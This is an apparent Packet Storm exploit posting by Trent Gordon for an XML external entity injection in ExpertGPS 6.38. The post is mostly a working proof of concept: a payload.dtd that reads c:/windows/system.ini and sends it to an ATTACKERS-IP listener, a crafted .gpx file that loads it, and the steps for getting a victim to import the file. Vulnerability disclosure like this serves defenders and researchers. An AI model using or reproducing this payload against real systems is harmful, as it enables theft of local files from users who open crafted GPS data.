what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ExpertGPS 6.38 XML Injection

ExpertGPS 6.38 XML Injection
Posted Feb 10, 2020
Authored by Trent Gordon

ExpertGPS version 6.38 suffers from an XML external entity injection vulnerability.

tags | exploit
SHA-256 | fc6cb6c0ba1587090a4154bc1adad108309657592a7685cdc3a977b2c6b9e8cf

ExpertGPS 6.38 XML Injection

Change Mirror Download
[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection
[+] Date: 2019-12-07
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: https://www.topografix.com/
[+] Software Link: http://download.expertgps.com/SetupExpertGPS.exe
[+] Disclosed at: 7FEB2020
[+] Version: 6.38
[+] Tested on: Windows 10
[+] CVE: N/A

==================
Background:
==================
ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellin, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format which is based on XML.

==================
Vulnerability:
==================
By having a user import a crafted .gpx file (XML Based GPS data file), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.)Open ExpertGPS.exe
2.)Select File -> Import Data from Other Programs...
3.)Select the crafted route.gpx file (with listener open on ATTACKERS-IP) and click "Open".

==================
Proof of Concept:
==================

a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)

b.) Hosted "payload.dtd"

<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">


c.) Exploited "route.xml"

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
%sp;
%param1;
%exfil;
]>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="ExpertGPS 6.38 using Garmin Colorado 400t" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wptx1="http://www.garmin.com/xmlschemas/WaypointExtension/v1" xmlns:gpxx="http://www.garmin.com/xmlschemas/GpxExtensions/v3" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.topografix.com/GPX/gpx_overlay/0/3 http://www.topografix.com/GPX/gpx_overlay/0/3/gpx_overlay.xsd http://www.topografix.com/GPX/gpx_modified/0/1 http://www.topografix.com/GPX/gpx_modified/0/1/gpx_modified.xsd http://www.topografix.com/GPX/Private/TopoGrafix/0/4 http://www.topografix.com/GPX/Private/TopoGrafix/0/4/topografix.xsd http://www.garmin.com/xmlschemas/WaypointExtension/v1 http://www8.garmin.com/xmlschemas/WaypointExtensionv1.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 http://www.garmin.com/xmlschemas/GpxExtensionsv3.xsd">
<metadata>
<bounds minlat="38.89767500" minlon="-77.03654700" maxlat="38.89767500" maxlon="-77.03654700"/>
<extensions>
<time xmlns="http://www.topografix.com/GPX/gpx_modified/0/1">2019-12-08T03:35:44.731Z</time>
<active_point xmlns="http://www.topografix.com/GPX/Private/TopoGrafix/0/4" lat="38.89767500" lon="-77.03654700">
</active_point>
</extensions>
</metadata>
<wpt lat="38.89767500" lon="-77.03654700">
<time>2019-12-08T03:35:44.732Z</time>
<name>1600PennsylvaniaAvenuenWashingt</name>
<cmt>1600 Pennsylvania Avenue
Washington</cmt>
<desc>1600 Pennsylvania Avenue
Washington, DC 20500</desc>
<sym>City (Small)</sym>
<type>Address</type>
<extensions>
<label xmlns="http://www.topografix.com/GPX/gpx_overlay/0/3">
<label_text>1600 Pennsylvania Avenue
Washington, DC 20500</label_text>
</label>
<gpxx:WaypointExtension>
<gpxx:Address>
<gpxx:StreetAddress>1600 Pennsylvania Avenue</gpxx:StreetAddress>
<gpxx:City>Washington</gpxx:City>
<gpxx:State>DC</gpxx:State>
<gpxx:Country>United States</gpxx:Country>
<gpxx:PostalCode>20500</gpxx:PostalCode>
</gpxx:Address>
</gpxx:WaypointExtension>
<wptx1:WaypointExtension>
<wptx1:Address>
<wptx1:StreetAddress>1600 Pennsylvania Avenue</wptx1:StreetAddress>
<wptx1:City>Washington</wptx1:City>
<wptx1:State>DC</wptx1:State>
<wptx1:Country>United States</wptx1:Country>
<wptx1:PostalCode>20500</wptx1:PostalCode>
</wptx1:Address>
</wptx1:WaypointExtension>
</extensions>
</wpt>
<extensions>
</extensions>
</gpx>


==================
Additional Attack Vectors:
==================
There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close